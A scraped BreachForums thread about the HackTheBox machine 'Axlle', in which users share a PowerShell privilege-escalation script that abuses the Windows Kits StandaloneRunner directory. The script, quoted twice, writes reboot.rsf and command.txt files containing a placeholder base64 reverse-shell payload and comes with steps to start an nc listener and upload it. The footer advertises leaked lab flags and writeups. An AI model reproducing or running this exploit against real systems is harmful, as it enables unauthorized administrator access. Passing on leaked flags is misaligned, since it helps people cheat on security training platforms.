JOIN BREACHFORUMS TELEGRAM
HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
Breached
Member
Posts: 4
Threads: 0
Joined: Jan 2024
Reputation: 0
#111
Oct 12, 2024, 05:13 PM
(Oct 01, 2024, 10:43 AM)Mas_PangaREP Wrote:
(Jul 09, 2024, 06:55 AM)Osminogka Wrote:
(Jul 09, 2024, 05:52 AM)maggi Wrote: I went to see if my janky ass way of getting on the box worked....works fine lobbing msf grenades still

BUT I believe they patched the root so overwriting of the standalonerunner is no longer a thing.

Yes here is exploit that you can use to get administrator shell:
$rebootContent = @"
myTestDir
True
"@
$rebootContent | Set-Content -Path ".\reboot.rsf"

New-Item -Path ".\myTestDir\working" -ItemType Directory -Force

New-Item -Path ".\rsf.rsf" -ItemType File -Force
Copy-Item -Path ".\rsf.rsf" -Destination ".\myTestDir\working"

$commandContent = @"
Powershell base64 reverse shell
"@
$commandContent | Set-Content -Path ".\command.txt"

start nc listener and run this exploit in standalonerunner directory, and you have to wait around one minute

can u tell spesifik method for this, using file or just copy paste that commands?. im stuck

You need just to save all this content that i posted inside .ps1 file, exploit.ps1 for example, also before uploading this file you need to specify correct payload for remote shell and then upload this script in C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\ directory then run
Reply
Breached
Member
Posts: 31
Threads: 4
Joined: Sep 2023
Reputation: 0
#112
Oct 23, 2024, 06:45 AM
(Oct 12, 2024, 05:13 PM)Osminogka Wrote:
(Oct 01, 2024, 10:43 AM)Mas_PangaREP Wrote:
(Jul 09, 2024, 06:55 AM)Osminogka Wrote:
(Jul 09, 2024, 05:52 AM)maggi Wrote: I went to see if my janky ass way of getting on the box worked....works fine lobbing msf grenades still

BUT I believe they patched the root so overwriting of the standalonerunner is no longer a thing.

Yes here is exploit that you can use to get administrator shell:
$rebootContent = @"
myTestDir
True
"@
$rebootContent | Set-Content -Path ".\reboot.rsf"

New-Item -Path ".\myTestDir\working" -ItemType Directory -Force

New-Item -Path ".\rsf.rsf" -ItemType File -Force
Copy-Item -Path ".\rsf.rsf" -Destination ".\myTestDir\working"

$commandContent = @"
Powershell base64 reverse shell
"@
$commandContent | Set-Content -Path ".\command.txt"

start nc listener and run this exploit in standalonerunner directory, and you have to wait around one minute

can u tell spesifik method for this, using file or just copy paste that commands?. im stuck

You need just to save all this content that i posted inside .ps1 file, exploit.ps1 for example, also before uploading this file you need to specify correct payload for remote shell and then upload this script in C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\ directory then run


It's not working, Can you provide more details and also the payload you used? plz
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 15 815 2 hours ago
Last Post: 0x5k1z0
  CPTS-FLAG darkcat 14 5,727 3 hours ago
Last Post: Sukon
  [FREE] CPTS 12 FLAGS pulsebreaker 78 2,604 3 hours ago
Last Post: hitlerssecretsidechick
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 91 8,292 3 hours ago
Last Post: hitlerssecretsidechick
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 381 94,521 6 hours ago
Last Post: xixi75

Forum Jump:


 Users browsing this forum: 2 Guest(s)